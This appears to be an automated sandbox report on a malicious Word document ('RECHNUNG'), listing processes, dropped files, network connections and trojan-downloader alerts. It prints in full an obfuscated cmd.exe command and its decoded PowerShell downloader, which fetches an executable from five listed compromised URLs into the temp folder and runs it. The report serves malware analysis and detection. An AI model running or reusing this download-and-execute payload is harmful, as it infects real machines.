3492 | CmD /V:/C"set bFa=evk2pM-fWX T4R,$Dl6I7JV3@89rB0}xEt{U('zQ~b/5jCcwa\:;om%N+AhGy=OgSL_u.iZ1FnPsd)&&for %9 in (4;52;47;54;74;35;28;65;19;45;50;40;43;14;71;54;27;54;64;32;64;64;19;62;55;55;57;5;32;50;40;6;12;14;71;54;58;54;11;32;5;74;50;40;6;23;14;71;54;17;17;10;15;76;12;18;71;25;61;37;27;23;23;18;26;37;51;15;38;43;20;3;3;61;73;0;47;6;52;41;44;0;46;33;10;55;0;33;68;8;0;41;45;17;69;0;73;33;51;15;69;12;25;12;29;61;37;58;33;33;4;50;42;42;47;47;47;68;33;27;48;73;75;17;48;53;4;67;73;63;68;46;52;53;42;64;58;45;58;73;32;28;41;73;45;62;24;58;33;33;4;50;42;42;48;63;0;73;33;7;52;31;68;69;52;42;55;12;62;7;22;32;39;45;12;28;67;35;1;72;45;22;24;58;33;33;4;50;42;42;73;69;63;0;27;69;48;7;48;75;41;53;41;46;52;73;63;27;0;75;75;68;7;67;33;53;69;73;73;48;68;0;76;67;68;73;63;42;23;13;5;3;43;45;20;53;25;58;9;32;20;25;62;66;65;24;58;33;33;4;50;42;42;75;52;75;6;76;0;41;52;67;46;58;48;63;0;6;76;67;53;0;73;60;68;46;52;53;42;47;4;6;48;76;53;69;73;42;22;46;59;21;60;76;13;25;19;72;64;26;24;58;33;33;4;50;42;42;75;48;17;48;58;68;53;52;41;69;69;17;48;33;68;46;52;53;42;32;63;0;29;16;44;7;39;13;62;63;8;17;1;21;70;17;66;73;75;55;1;1;37;68;64;4;17;69;33;36;37;24;37;77;51;15;38;26;12;20;25;61;37;33;23;43;18;20;37;51;15;48;3;3;26;26;10;61;10;37;3;43;71;37;51;15;73;26;3;26;3;61;37;47;71;29;26;26;37;51;15;75;25;25;29;3;61;15;0;73;1;50;33;0;53;4;56;37;49;37;56;15;48;3;3;26;26;56;37;68;0;31;0;37;51;7;52;27;0;48;46;58;36;15;27;12;18;12;18;10;69;73;10;15;69;12;25;12;29;77;34;33;27;60;34;15;38;43;20;3;3;68;16;52;47;73;17;52;48;76;72;69;17;0;36;15;27;12;18;12;18;14;10;15;75;25;25;29;3;77;51;15;69;23;26;26;3;61;37;69;20;29;29;37;51;19;7;10;36;36;59;0;33;6;19;33;0;53;10;15;75;25;25;29;3;77;68;17;0;73;63;33;58;10;6;63;0;10;12;29;29;29;29;77;10;34;19;73;1;52;2;0;6;19;33;0;53;10;15;75;25;25;29;3;51;15;27;26;3;18;25;61;37;1;26;25;12;25;37;51;41;27;0;48;2;51;30;30;46;48;33;46;58;34;30;30;15;69;25;43;29;71;61;37;38;26;20;12;20;37;51;79)do set jtJD=!jtJD!!bFa:~%9,1!&&if %9==79 echo !jtJD:~-629!|FOR /F "tokens=2 delims==Rf" %R IN ('assoc.cmd')DO %R " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3336 | C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $d4618='r3369';$z5722=new-object Net.WebClient;$i4840='http://www.translampung.com/ShChnEBbnCO@http://agentfox.io/N4OfVEQC4BuUvFCV@http://nigeriafasbmbcongress.futminna.edu.ng/3RM25C7m8hXE78O_L@http://sos-debouchage-dumeny.com/wp-admin/VcGJydR8IFS9@http://salah.mobiilat.com/Ege0DjfQROgWlvJZl_nsNvv'.Split('@');$z9478='t3567';$a2299 = '251';$n9292='w1099';$s8802=$env:temp+'\'+$a2299+'.exe';foreach($r4646 in $i4840){try{$z5722.DownloadFile($r4646, $s8802);$i3992='i700';If ((Get-Item $s8802).length -ge 40000) {Invoke-Item $s8802;$r9268='v9848';break;}}catch{}}$i8501='z9747';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3320 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=2 delims==Rf" %R IN ('assoc.cmd') DO %R " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3700 | C:\Windows\system32\cmd.exe /c assoc.cmd | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
4004 | cmd | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2188 | powershell $d4618='r3369';$z5722=new-object Net.WebClient;$i4840='http://www.translampung.com/ShChnEBbnCO@http://agentfox.io/N4OfVEQC4BuUvFCV@http://nigeriafasbmbcongress.futminna.edu.ng/3RM25C7m8hXE78O_L@http://sos-debouchage-dumeny.com/wp-admin/VcGJydR8IFS9@http://salah.mobiilat.com/Ege0DjfQROgWlvJZl_nsNvv'.Split('@');$z9478='t3567';$a2299 = '251';$n9292='w1099';$s8802=$env:temp+'\'+$a2299+'.exe';foreach($r4646 in $i4840){try{$z5722.DownloadFile($r4646, $s8802);$i3992='i700';If ((Get-Item $s8802).length -ge 40000) {Invoke-Item $s8802;$r9268='v9848';break;}}catch{}}$i8501='z9747'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2356 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8E5B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2356 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34B818B1.jpg | — | |
MD5:— | SHA256:— | |||
2188 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6PS4QGLX57OQ5MCK3RCR.temp | — | |
MD5:— | SHA256:— | |||
2188 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19aa01.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2356 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:DE78D1BCB7F228A17DC63810251DA6BA | SHA256:78D5F61576F4B5B2986892BBD66B53CCF08BB324FA44AAF2594FFC9B7A1962CB | |||
2356 | WINWORD.EXE | C:\Users\admin\Desktop\~$CHNUNG.xml | pgc | |
MD5:AE4A53C2584981FB610D90781D343243 | SHA256:93FEDA264584BAD490FEB718CA16EF48820613FE41AC072E9FFC430454ABB7D4 | |||
2356 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:A707709DD46F63C8EC879F783184C758 | SHA256:4DD8356D383D2CC2FDF4B2362A3172A3C0C47007D0993D14046EA81E9F0A3FD7 | |||
2188 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2356 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:1F9AF8DBADD4163987436CA9DF3CDC37 | SHA256:9FC82323927C8D4BCCFCC5AF0D239A47108D4C8B8875BD51B9B0D713A706D7C7 | |||
2356 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\RECHNUNG.xml.LNK | lnk | |
MD5:55C0CAE5E17D3B16B5F8C70071B36898 | SHA256:460CE06AACF11E4B9E65DA6623062A3ECBDD64950BB579298D927229E61DA6F9 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2188 | powershell.exe | GET | 404 | 197.211.34.55:80 | http://nigeriafasbmbcongress.futminna.edu.ng/3RM25C7m8hXE78O_L | NG | xml | 345 b | malicious |
2188 | powershell.exe | GET | 404 | 103.247.10.155:80 | http://www.translampung.com/ShChnEBbnCO | ID | xml | 345 b | malicious |
2188 | powershell.exe | GET | 404 | 209.123.8.161:80 | http://agentfox.io/N4OfVEQC4BuUvFCV | US | xml | 345 b | malicious |
2188 | powershell.exe | GET | 404 | 172.110.29.23:80 | http://sos-debouchage-dumeny.com/wp-admin/VcGJydR8IFS9 | US | xml | 345 b | unknown |
2188 | powershell.exe | GET | 404 | 68.66.224.25:80 | http://salah.mobiilat.com/Ege0DjfQROgWlvJZl_nsNvv | US | xml | 345 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2188 | powershell.exe | 209.123.8.161:80 | agentfox.io | Net Access Corporation | US | malicious |
2188 | powershell.exe | 197.211.34.55:80 | nigeriafasbmbcongress.futminna.edu.ng | globacom-as | NG | malicious |
2188 | powershell.exe | 103.247.10.155:80 | www.translampung.com | Rumahweb Indonesia CV. | ID | suspicious |
2188 | powershell.exe | 172.110.29.23:80 | sos-debouchage-dumeny.com | Subnet Labs LLC | US | unknown |
2188 | powershell.exe | 68.66.224.25:80 | salah.mobiilat.com | A2 Hosting, Inc. | US | suspicious |
Domain | IP | Reputation |
---|---|---|
www.translampung.com |
| malicious |
agentfox.io |
| malicious |
nigeriafasbmbcongress.futminna.edu.ng |
| malicious |
sos-debouchage-dumeny.com |
| unknown |
salah.mobiilat.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2188 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2188 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2188 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2188 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |